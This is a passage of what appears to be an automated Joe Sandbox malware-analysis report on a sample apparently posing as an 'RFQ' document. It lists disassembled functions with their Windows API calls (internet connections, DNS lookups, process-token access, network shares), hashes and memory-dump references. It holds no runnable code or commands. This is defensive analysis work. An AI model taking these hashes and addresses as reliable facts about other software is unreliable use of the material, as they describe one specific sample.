Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D

Function 00471767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3

Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
Instruction ID: 71b6e4b1fe2b952a6419c9952bf0f018ffc457c15b1f1ac8131077084853f328
Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
Instruction Fuzzy Hash: 1121C235200601BFEB169F648C01FFBBBA9FF48710F10842FF91996660D775D815A7A9

Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00435101

Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C

Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50

gethostbyname.WSOCK32(?,?,?), ref: 00476399
WSAGetLastError.WSOCK32(00000000), ref: 004763A4
_memmove.LIBCMT ref: 004763D1
inet_ntoa.WSOCK32(?), ref: 004763DC

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69

Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94

Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
GetClientRect.USER32(?,?), ref: 0043B5FB
GetCursorPos.USER32(?), ref: 0043B605
ScreenToClient.USER32(?,?), ref: 0043B610

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9

Function 0045D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0045D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0045D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0045D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0045D897

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
Instruction ID: 3b05f8a101c890c8fbc83375acaac98503a8deaba450bce75694a4266b83033e
Opcode Fuzzy Hash: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
Instruction Fuzzy Hash: 48115E75A05304DBE330AF50EC08F97BBBCEF00B01F10896EA926D6151D7B4E94D9BA5

Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00436FDB

Part of subcall function 004376C2: __fltout2.LIBCMT ref: 004376EB

__cftog_l.LIBCMT ref: 00437001
__cftoe_l.LIBCMT ref: 00437033

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85

Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0048B2E4
ScreenToClient.USER32(?,?), ref: 0048B2FC
ScreenToClient.USER32(?,?), ref: 0048B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94

Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00466BE6

Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9

_memmove.LIBCMT ref: 00466C09
_memset.LIBCMT ref: 00466C16
LeaveCriticalSection.KERNEL32(?), ref: 00466C26

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9

Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00402231
SetTextColor.GDI32(?,000000FF), ref: 0040223B
SetBkMode.GDI32(?,00000001), ref: 00402250
GetStockObject.GDI32(00000005), ref: 00402258
GetWindowDC.USER32(?,00000000), ref: 0043BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
ReleaseDC.USER32(?,00000000), ref: 0043BEED

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16

Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0045871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754

Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%I, xrefs: 0040624E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID: %I
API String ID: 0-63094095
Opcode ID: 7529cc8c48647e6d4a72391ec485b67292564c6fe3cbb07e68201f0b86d76f72
Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
Opcode Fuzzy Hash: 7529cc8c48647e6d4a72391ec485b67292564c6fe3cbb07e68201f0b86d76f72
Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E

Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0047AFAE

Strings

xbL, xrefs: 0047AFE4
xbL, xrefs: 0047B010

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __itow_s
String ID: xbL$xbL
API String ID: 3653519197-3351732020
Opcode ID: e709fd47f5c2feaab7cb22cc2c50c9004a19bc4dd19b06f16d126bf100fb6cf2
Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
Opcode Fuzzy Hash: e709fd47f5c2feaab7cb22cc2c50c9004a19bc4dd19b06f16d126bf100fb6cf2
Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99

Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

__wcsnicmp.LIBCMT ref: 0046B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6

Strings

LPT, xrefs: 0046B027

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 22386211fa87ba6f25b54d14b3f4bab1e3a1f04917f9a9de026b4ee2e74de440
Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
Opcode Fuzzy Hash: 22386211fa87ba6f25b54d14b3f4bab1e3a1f04917f9a9de026b4ee2e74de440
Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99

Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00412968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981

Strings

@, xrefs: 00412975

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A

Function 00469734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00404F0B: __fread_nolock.LIBCMT ref: 00404F29

_wcscmp.LIBCMT ref: 00469824
_wcscmp.LIBCMT ref: 00469837

Strings

FILE, xrefs: 00469770

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
